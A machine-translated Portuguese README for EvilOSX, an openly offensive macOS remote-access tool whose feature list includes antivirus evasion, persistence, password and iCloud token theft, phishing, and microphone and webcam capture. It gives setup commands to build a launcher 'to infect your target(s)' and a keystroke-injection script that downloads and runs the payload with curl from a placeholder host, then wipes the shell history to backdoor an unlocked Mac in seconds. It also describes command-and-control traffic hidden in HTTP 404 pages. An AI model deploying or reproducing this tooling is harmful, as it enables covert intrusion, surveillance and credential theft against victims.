EvilOSX

Marco gerador por Cedric Owens

• Emular uma instância do terminal
• Sistema de módulo extensível simples
• Sem dependências de bot (python puro)
• Não detectado por antivírus (OpenSSL AES-256 Cargas úteis criptografadas)
• Persistente
• Suporte de GUI e CLI
• Recupere as senhas do Chrome
• Recuperar tokens e contatos do iCloud
• Recupere/monitore a área de transferência
• Recuperar o histórico do navegador (Chrome e Safari)
• Phish for iCloud senhas via iTunes
• Enumeração de backup do iTunes (iOS)
• Registre o microfone
• Pegue uma captura de tela ou foto de desktop usando a webcam
• Tente se enraizar por meio da escalada de privilégios locais

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

Aviso: como as cargas úteis são criadas exclusivas para o sistema de destino (automaticamente pelo servidor), o servidor deve estar em execução quando qualquer bot se conectar pela primeira vez.

Há também um CLI para quem quer usar isso sobre SSH:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

Este projeto foi criado para ser usado com meu patinho de borracha, aqui está o script simples:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• Demora cerca de 10 segundos para backdoor qualquer Mac desbloqueado, que é ...... Nice
• Termina L está escrito dessa maneira intencionalmente, em alguns sistemas Spotlight não encontrará o terminal de outra forma.
  
• Para ignorar o assistente de configuração do teclado, altere o Vid & PID, que pode ser encontrado aqui.
  O teclado de alumínio (ISO) é provavelmente o que você está procurando.

O Evilosx será mantido sob as diretrizes de versão semântica o máximo possível.
Os lançamentos de servidor e bot serão numerados com o formato a seguir:

 <major>.<minor>.<patch>

E construído com as seguintes diretrizes:

• Quebrar a compatibilidade com versões anteriores (com bots mais antigas) bate o major
• Novas adições sem quebrar a compatibilidade com versões anteriores
• Correções de bugs e alterações miscões bate o patch

Para mais informações sobre Semver, visite https://semver.org/.

• Infectar uma máquina está dividida em três partes:
  • Um lançador é executado na máquina de destino cujo único objetivo é executar o stager
  • O estilista pede ao servidor um carregador que lida com como uma carga útil será carregada
  • O carregador recebe uma carga útil exclusivamente criptografada e depois enviada de volta ao stager
• O servidor esconde suas comunicações enviando mensagens escondidas nas páginas de erro HTTP 404 (de "Hatching in Plain Sight" de Blackhat))
  • As solicitações de comando são recuperadas do servidor por meio de uma solicitação GET
  • As respostas de comando são enviadas ao servidor por meio de uma solicitação de postagem
• Os módulos aproveitam a natureza dinâmica de Python, eles são simplesmente enviados pela rede compactada com Zlib, juntamente com qualquer opção de configuração
• Como o bot apenas se comunica com o servidor e nunca o contrário, o servidor não tem como saber quando um bot fica offline

Sinta -se à vontade para enviar quaisquer problemas ou solicitações de recursos aqui.

Para um guia simples sobre como criar módulos, clique aqui.

• O Awesome Empire Project
• Grite para Patrick Wardle para suas conversas incríveis, confira o objetivo
• Manwhoami para seus projetos: osxchromedecrypt, mmEtoKendecrypt, iCloudContacts
  (agora excluído ... deixe -me saber se você reaparece)
• O módulo Slowloris é praticamente copiado de Pyslowloris
• Urwid e este código que me salvou muito tempo com a CLI
• Logotipo criado por Motusora

GPLV3